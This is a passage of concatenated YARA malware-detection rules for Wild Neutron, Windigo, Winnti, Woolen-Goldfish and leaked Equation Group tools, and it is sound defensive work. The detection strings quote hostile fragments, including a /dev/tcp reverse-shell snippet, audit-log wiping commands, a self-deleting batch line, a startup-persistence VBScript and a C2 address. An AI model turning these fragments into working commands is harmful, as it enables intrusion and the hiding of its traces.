fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.00' */ $s15 = "%-8s %-3s %*s %s %s" fullword wide /* score: '8.00' */ $s16 = " %%%c in (%s) do " fullword wide /* score: '8.00' */ condition: uint16(0) == 0x5a4d and filesize < 1677KB and 2 of ($x*) and 6 of ($s*) } rule WildNeutron_Sample_9 { meta: description = "Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e" strings: $s0 = "http://get.adobe.com/flashplayer/" fullword wide /* PEStudio Blacklist: strings */ /* score: '30.00' */ $s1 = "xxxxxxxxxxxxxxxxxxxx" fullword wide /* reversed goodware string 'xxxxxxxxxxxxxxxxxxxx' */ /* score: '19.00' */ $s4 = " Player Installer/Uninstaller" fullword wide /* PEStudio Blacklist: strings */ /* score: '11.42' */ $s5 = "Adobe Flash Plugin Updater" fullword wide /* PEStudio Blacklist: strings */ /* score: '11.00' */ $s6 = "uSOFTWARE\\Adobe" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.42' */ $s11 = "2008R2" fullword wide /* PEStudio Blacklist: os */ /* score: '8.00' */ $s12 = "%02d.%04d.%s" fullword wide /* score: '7.02' */ $s13 = "%d -> %d" fullword wide /* score: '7.00' */ condition: uint16(0) == 0x5a4d and filesize < 500KB and all of them } rule WildNeutron_Sample_10 { meta: description = "Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7" strings: $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del 
/f %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '46.00' */ $s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii /* PEStudio Blacklist: strings */ /* score: '37.00' */ $s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */ $s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $x1 = "wdigestEx.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '26.00' */ $x2 = "dpcore16t.dll" fullword ascii /* score: '21.00' */ $x3 = "mspool.dll" fullword ascii /* score: '21.00' */ $x4 = "msvcse.exe" fullword ascii /* score: '20.00' */ $x5 = "mshtaex.exe" fullword wide /* score: '20.00' */ $x6 = "iastor32.exe" fullword ascii /* score: '20.00' */ $y1 = "Installer.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '25.00' */ $y2 = "Info: Process %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '21.00' */ $y3 = "Error: GetFileTime %s 0x%x" fullword ascii /* score: '17.00' */ $y4 = "Install succeeded" fullword 
ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $y5 = "Error: RegSetValueExA 0x%x" fullword ascii /* score: '9.00' */ condition: uint16(0) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ($s*) and 1 of ($x*) and 3 of ($y*))) } /* Super Rules ------------------------------------------------------------- */ rule WildNeutron_javacpl { meta: description = "Wild Neutron APT Sample Rule - from files 683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9, 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92, 8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 super_rule = 1 hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9" hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92" hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a" strings: $x1 = "javacpl.exe" fullword wide /* score: '3.00' */ /* Goodware String - occured 2 times */ $s0 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '35.00' */ $s1 = "Error executing CreateProcess()!!" fullword wide /* PEStudio Blacklist: strings */ /* score: '31.00' */ $s2 = "http://www.java.com/en/download/installed.jsp?detect=jre" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */ $s3 = "RunFile: couldn't load SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */ $s4 = "Process is not running any more" fullword wide /* PEStudio Blacklist: strings */ /* score: '22.00' */ $s6 = "Windows NT Version %lu.%lu" fullword wide /* PEStudio Blacklist: os */ /* score: '19.00' */ $s7 = "Usage: destination [reference]" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s8 = "Invalid input handle!!!" 
fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */ $s9 = ".com;.exe;.bat;.cmd" fullword wide /* score: '15.00' */ $s10 = ") -%s-> %s (" fullword ascii /* score: '14.00' */ $s11 = "cmdextversion" fullword wide /* score: '14.00' */ $s12 = "Invalid pid (%s)" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.00' */ $s13 = "\"%s\" /K %s" fullword wide /* score: '11.02' */ $s14 = "Error setting %s (%s)" fullword wide /* score: '11.00' */ $s16 = "cmdcmdline" fullword wide /* score: '11.00' */ $s39 = "2008R2" fullword ascii /* PEStudio Blacklist: os */ /* score: '8.00' */ condition: uint16(0) == 0x5a4d and filesize < 1677KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // Operation Windigo yara rules // For feedback or questions contact us at: windigo@eset.sk // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2014, ESET // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. 
// IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//

// Linux/Onimiki (Operation Windigo): nine fixed byte sequences taken from one
// code region of the analysed sample, all of which must be present.
// Nothing in the condition restricts the scan to ELF files or by size, so the
// whole body of every scanned file is searched. The hex patterns contain no
// wildcards or jumps, so a rebuilt binary (different compiler, optimisation
// level or relocation) is unlikely to match; treat a miss as inconclusive.
rule onimiki
{
    meta:
        description = "Linux/Onimiki malicious DNS server"
        malware = "Linux/Onimiki"
        operation = "Windigo"
        author = "Olivier Bilodeau <bilodeau@eset.com>"
        created = "2014-02-06"
        reference = "http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf"
        contact = "windigo@eset.sk"
        source = "https://github.com/eset/malware-ioc/"
        license = "BSD 2-Clause"

    strings:
        // code from offset: 0x46CBCD
        $a1 = {43 0F B6 74 2A 0E 43 0F B6 0C 2A 8D 7C 3D 00 8D}
        $a2 = {74 35 00 8D 4C 0D 00 89 F8 41 F7 E3 89 F8 29 D0}
        $a3 = {D1 E8 01 C2 89 F0 C1 EA 04 44 8D 0C 92 46 8D 0C}
        $a4 = {8A 41 F7 E3 89 F0 44 29 CF 29 D0 D1 E8 01 C2 89}
        $a5 = {C8 C1 EA 04 44 8D 04 92 46 8D 04 82 41 F7 E3 89}
        $a6 = {C8 44 29 C6 29 D0 D1 E8 01 C2 C1 EA 04 8D 04 92}
        $a7 = {8D 04 82 29 C1 42 0F B6 04 21 42 88 84 14 C0 01}
        $a8 = {00 00 42 0F B6 04 27 43 88 04 32 42 0F B6 04 26}
        $a9 = {42 88 84 14 A0 01 00 00 49 83 C2 01 49 83 FA 07}

    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.
*/

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2015-10-10
   Identifier: Winnti Malware
*/

// Signer name from a code-signing certificate abused by the Winnti group.
// With "1 of them" on a publisher name, any PE carrying that signer string
// matches -- including benign software signed with the same certificate --
// so this rule identifies the certificate, not malicious code, exactly as the
// description says. $s2 contains $s1, so both fire on the ",Ltd" spelling.
// $s3 keeps a byte on each side of the company name ("$" before, "0" after),
// presumably ASN.1 framing from the certificate blob; confirm against a
// sample before "tidying" it.
rule Winnti_signing_cert {
    meta:
        description = "Detects a signing certificate used by the Winnti APT group"
        author = "Florian Roth"
        reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
        date = "2015-10-10"
        score = 75
        hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
        hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
    strings:
        $s1 = "Guangzhou YuanLuo Technology Co." ascii
        $s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
        $s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and 1 of them
}

// Winnti kernel-mode component. The driver object name $x1 is mandatory
// (nsiproxy is also the name of a legitimate Windows driver, which is why it
// is required but not sufficient); one of the device names and two of the
// support strings must appear as well. There is no filesize guard, and --
// unlike its siblings in this set -- no "reference" meta entry.
// $s4 is the Windows network-adapter device class GUID, present in ordinary
// network drivers too; it only counts towards "2 of ($s*)".
rule Winnti_malware_Nsiproxy {
    meta:
        description = "Detects a Winnti rootkit"
        author = "Florian Roth"
        date = "2015-10-10"
        score = 75
        hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
        hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
        hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
        hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
        hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
    strings:
        $x1 = "\\Driver\\nsiproxy" fullword wide
        $a1 = "\\Device\\StreamPortal" fullword wide
        $a2 = "\\Device\\PNTFILTER" fullword wide
        $s1 = "Cookie: SN=" fullword ascii
        $s2 = "\\BaseNamedObjects\\_transmition_synchronization_" fullword wide
        $s3 = "Winqual.sys" fullword wide
        $s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
        $s5 = "http://www.wasabii.com.tw 0" fullword ascii
    condition:
        uint16(0) == 0x5a4d and $x1 and 1 of ($a*) and 2 of ($s*)
}

// Winnti "Update.dll" loader. Two ways to match: one of the high-confidence
// $c strings (driver file names plus what looks like a deliberately mangled
// certificate-chain name) together with three support strings, or every $s
// string at once.
// NOTE(review): hash4 repeats hash2 verbatim -- almost certainly a copy
// error; one intended sample hash is missing and should be looked up.
rule Winnti_malware_UpdateDLL {
    meta:
        description = "Detects a Winnti malware - Update.dll"
        author = "Florian Roth"
        reference = "VTI research"
        date = "2015-10-10"
        score = 75
        hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
        hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
        hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
        hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"   // duplicate of hash2, see note above
    strings:
        $c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii
        $c2 = "AHDNEAFE1.sys" fullword ascii
        $c3 = "SOTEFEHJ3.sys" fullword ascii
        $c4 = "MainSYS64.sys" fullword ascii
        $s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
        $s2 = "Update.dll" fullword ascii
        $s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide
        $s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide
        $s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" fullword wide
        $s6 = "\\??\\pipe\\usbpcg%d" fullword wide
        $s7 = "\\??\\pipe\\usbpcex%d" fullword wide
        $s8 = "HOST: %s" fullword ascii
        $s9 = "$$$--Hello" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and ( ( 1 of ($c*) and 3 of ($s*) ) or all of ($s*) )
}

// Winnti driver component using the FWPKCLNT.SYS name. $s2 is the name of a
// genuine Windows system file and $s0 is the network-adapter class GUID, so
// neither is distinctive on its own; the detection rests on the full
// combination, which "all of them" enforces. $s11 is flagged by the author
// as a goodware string and, being required, can only narrow the match.
rule Winnti_malware_FWPK {
    meta:
        description = "Detects a Winnti malware - FWPKCLNT.SYS"
        author = "Florian Roth"
        reference = "VTI research"
        date = "2015-10-10"
        score = 75
        hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
        hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
        hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
    strings:
        $s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" fullword wide
        $s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii
        $s2 = "FWPKCLNT.SYS" fullword ascii
        $s3 = "Port Layer" fullword wide
        $s4 = "%x->%x, icmp type %d, code %d" fullword ascii
        $s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" fullword wide
        $s6 = "\\Ndi\\Interfaces" fullword wide
        $s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" fullword wide
        $s8 = "Bad packet" fullword ascii
        $s9 = "\\BaseNamedObjects\\EKV0000000000" fullword wide
        $s10 = "%x->%x" fullword ascii
        $s11 = "IPInjectPkt" fullword ascii /* Goodware String - occured 6 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 642KB and all of them
}

// Generic rule for the StreamPortal driver. It overlaps with
// Winnti_malware_Nsiproxy: hash1-hash3 here are three of that rule's five
// samples and $s3/$s5/$s6 repeat its $a1/$s1/$s2, so a hit on both rules is
// expected for those files. $s17 and $s19 are common driver strings (marked
// as goodware by the author); because "all of them" requires them they can
// only narrow the match, never widen it.
rule Winnti_malware_StreamPortal_Gen {
    meta:
        description = "Detects a Winnti malware - Streamportal"
        author = "Florian Roth"
        reference = "VTI research"
        date = "2015-10-10"
        score = 75
        hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
        hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
        hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
    strings:
        $s0 = "Proxies destination address/port for TCP" fullword wide
        $s3 = "\\Device\\StreamPortal" fullword wide
        $s4 = "Transport-Data Proxy Sub-Layer" fullword wide
        $s5 = "Cookie: SN=" fullword ascii
        $s6 = "\\BaseNamedObjects\\_transmition_synchronization_" fullword wide
        $s17 = "NTOSKRNL.EXE" fullword wide /* Goodware String - occured 4 times */
        $s19 = "FwpsReferenceNetBufferList0" fullword ascii /* Goodware String - occured 5 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 275KB and all of them
}

// Third-party Winnti rule (Drainware). Points to know when triaging hits:
// the strings carry no modifiers, so they match ASCII only and are not
// fullword; there is no MZ/filesize guard; and the meta key is "ref" where
// the other rules in this set use "reference". $s2 is the Windows
// network-adapter class GUID and $s3 is the TLS key-derivation label, both
// common in benign binaries; $s0 is shared with the two rules above. The
// selectivity comes from $s1 and $s4, which "all of ($s*)" requires as well.
rule WinntiPharma {
    meta:
        author = "Jose Ramon Palanco"
        copyright = "Drainware, Inc."
        date = "2015-06-23"
        description = "Backdoor Win64 Winnti Pharma"
        ref = "https://securelist.com/blog/research/70991/games-are-over/"
    strings:
        $s0 = "Cookie: SN="
        $s1 = "{3ec05b4a-ea88-1378-3389-66706ba27600}"
        $s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
        $s3 = "master secret"
        $s4 = "MyEngineNetEvent"
    condition:
        all of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.
*/

// None of the four Woolen-Goldfish rules below reads a pe.* field, so this
// import is unused here; it is harmless and may serve rules elsewhere in
// this concatenated file.
import "pe"

// Sample-specific rule: two short strings, both required, with no MZ or
// filesize guard. A "SvcName" literal and a "Cannot execute (%d)" error text
// are not unusual in service executables, so this rule is expected to need
// corroboration -- hence the lowest score in the set (60 against 90).
rule WoolenGoldfish_Sample_1 {
    meta:
        description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
        author = "Florian Roth"
        reference = "http://goo.gl/NpJpVZ"
        date = "2015/03/25"
        score = 60
        hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
    strings:
        $s1 = "Cannot execute (%d)" fullword ascii
        $s16 = "SvcName" fullword ascii
    condition:
        all of them
}

// Super rule over three samples. Matches on one campaign-specific artefact
// ($x*: the developer's user directory, the project path, or the NTSuser.exe
// name) plus two support strings, or on six support strings alone.
// Strings with no ascii/wide modifier ($x0, $x1, $s2-$s6, $s8, $s9) are
// matched as ASCII only. $s2-$s5 are VBScript fragments that create a
// shortcut named WinDefender.lnk (strSTUP presumably resolves to the Startup
// folder -- confirm against the report); $s1 is an IP literal carried by the
// samples, presumably the C2 address.
rule WoolenGoldfish_Generic_1 {
    meta:
        description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
        author = "Florian Roth"
        reference = "http://goo.gl/NpJpVZ"
        date = "2015/03/25"
        score = 90
        super_rule = 1
        hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
        hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
        hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
    strings:
        $x0 = "Users\\Wool3n.H4t\\"
        $x1 = "C-CPP\\CWoolger"
        $x2 = "NTSuser.exe" fullword wide
        $s1 = "107.6.181.116" fullword wide
        $s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
        $s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
        $s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
        $s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
        $s6 = "wlg.dat" fullword
        $s7 = "woolger" fullword wide
        $s8 = "[Enter]" fullword
        $s9 = "[Control]" fullword
    condition:
        ( 1 of ($x*) and 2 of ($s*) ) or ( 6 of ($s*) )
}

// Single-string rule: "all of them" here is just $s0, a build path left in
// the binaries. No MZ/filesize guard, so every scanned file is searched.
rule WoolenGoldfish_Generic_2 {
    meta:
        description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
        author = "Florian Roth"
        reference = "http://goo.gl/NpJpVZ"
        date = "2015/03/25"
        score = 90
        hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
        hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
        hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
        hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
    strings:
        $s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
    condition:
        all of them
}

// Any single $x string (a distinctive error text, the C2 URI pattern with
// its extra parameters, or the connect-back channel error) is sufficient on
// its own; otherwise eight of the generic $s strings are needed. There is no
// file-type guard. $s0 reads like several import names run together
// (kernel32.dll, GetProcAddress, LoadLibraryA, ws2_32.dll) as found in a
// loader stub; $s6 deliberately ends in a space and is fullword-anchored.
rule WoolenGoldfish_Generic_3 {
    meta:
        description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
        author = "Florian Roth"
        reference = "http://goo.gl/NpJpVZ"
        date = "2015/03/25"
        score = 90
        hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
        hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
    strings:
        $x1 = "... get header FATAL ERROR !!! %d bytes read > header_size" fullword ascii
        $x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
        $x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
        $s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
        $s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
        $s2 = "Attempting to unlock uninitialized lock!" fullword ascii
        $s4 = "unable to load kernel32.dll" fullword ascii
        $s5 = "index.php?c=%S&r=%x" fullword wide
        $s6 = "%s len:%d " fullword ascii
        $s7 = "Encountered error sending syscall response to client" fullword ascii
        $s9 = "/info.dat" fullword ascii
        $s10 = "Error entering thread lock" fullword ascii
        $s11 = "Error exiting thread lock" fullword ascii
        $s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
    condition:
        ( 1 of ($x*) ) or ( 8 of ($s*) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2017-04-08
   Identifier: Equation Group hack tools leaked by ShadowBrokers
   Notice: Avoiding false positives is difficult with almost no antivirus coverage during the rule testing phase.
Please report back false positives via https://github.com/Neo23x0/signature-base/issues */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_emptycriss { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91" strings: $s1 = "./emptycriss <target IP>" fullword ascii $s2 = "Cut and paste the following to the telnet prompt:" fullword ascii $s8 = "environ define TTYPROMPT abcdef" fullword ascii condition: ( filesize < 50KB and 1 of them ) } rule EquationGroup_scripme { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file scripme" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a" strings: $x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii $x2 = "Cannot read $opetc/scripme.override -- are you root?" 
ascii $x3 = "$ENV{EXPLOIT_SCRIPME}" ascii $x4 = "$opetc/scripme.override" ascii condition: ( filesize < 30KB and 1 of them ) } rule EquationGroup_cryptTool { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2" strings: $s1 = "The encryption key is " fullword ascii $s2 = "___tempFile2.out" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and all of them ) } rule EquationGroup_dumppoppy { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719" strings: $x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii $x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii $l1 = "End of $destfile determined by \"^Connection closed by foreign host" condition: ( filesize < 20KB and 1 of them ) } rule EquationGroup_Auditcleaner { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626" strings: $x1 = "> /var/log/audit/audit.log; rm -f ." ascii $x2 = "Pastables to run on target:" ascii $x3 = "cp /var/log/audit/audit.log .tmp" ascii $l1 = "Here is the first good cron session from" fullword ascii $l2 = "No need to clean LOGIN lines." 
fullword ascii condition: ( filesize < 300KB and 1 of them ) } rule EquationGroup_reverse_shell { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826" strings: $s1 = "sh >/dev/tcp/" ascii $s2 = " <&1 2>&1" fullword ascii condition: ( filesize < 1KB and all of them ) } rule EquationGroup_tnmunger { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2" strings: $s1 = "TEST: mungedport=%6d pp=%d unmunged=%6d" fullword ascii $s2 = "mungedport=%6d pp=%d unmunged=%6d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 10KB and 1 of them ) } rule EquationGroup_ys_ratload { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75" strings: $x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii $x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii $x3 = "CALLBACK_PORT=32177" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 3KB and 1 of them ) } rule EquationGroup_eh_1_1_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628" strings: $x1 = "usage: %s -e -v -i 
